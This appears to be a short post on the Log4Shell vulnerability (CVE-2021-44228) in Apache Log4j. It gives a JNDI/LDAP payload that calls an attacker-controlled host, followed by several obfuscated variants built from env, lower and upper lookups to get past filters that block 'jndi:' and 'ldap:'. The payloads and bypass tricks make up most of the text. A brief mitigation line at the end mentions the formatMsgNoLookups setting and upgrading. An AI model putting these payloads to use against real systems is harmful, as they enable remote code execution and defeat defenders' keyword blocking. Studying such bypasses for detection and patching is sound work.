๐ฑโ๐ป โ๏ธ ๐คฌ LOG4J Java exploit - A trick to bypass words blocking patches
CVE-2021-44228 works on:
log4j: 2.0 <= Apache log4j <= 2.14.1
Java version already patched: 6u211+, 7u201+, 8u191+, 11.0.1+.
Simple attacker script (Possible RCE):
${jndi:ldap://somesitehackerofhell.com/z}
Many developers started to block phrases:
- "ldap:"
- "jndi:"
to secure applications.
However, the attacker can bypass it by using one of these techniques:
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}
From Apache Log4j 2 documentation: ${env:ENV_NAME:-default_value}
If there is no ENV_NAME system environment variable, use text after :-
The attacker can use any name instead of ENV_NAME, but it has to no exists.
On windows, you can check your system environment variables in PowerShell by writing:
dir env:
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}
Lower Lookup The LowerLookup converts the passed in argument to lower case. Presumably the value will be the result of a nested lookup.
${lower:<text>}
Upper Lookup The UpperLookup converts the passed in argument to upper case. Presumably the value will be the result of a nested lookup.
${upper:<text>}
I am not an author of the Lower or Upper Lookup bypass or CVE-2021-44228
Start your server with log4j2.formatMsgNoLookups
set to true
, or update to log4j-2.15.0-rc1
or later.
Keep it safe!
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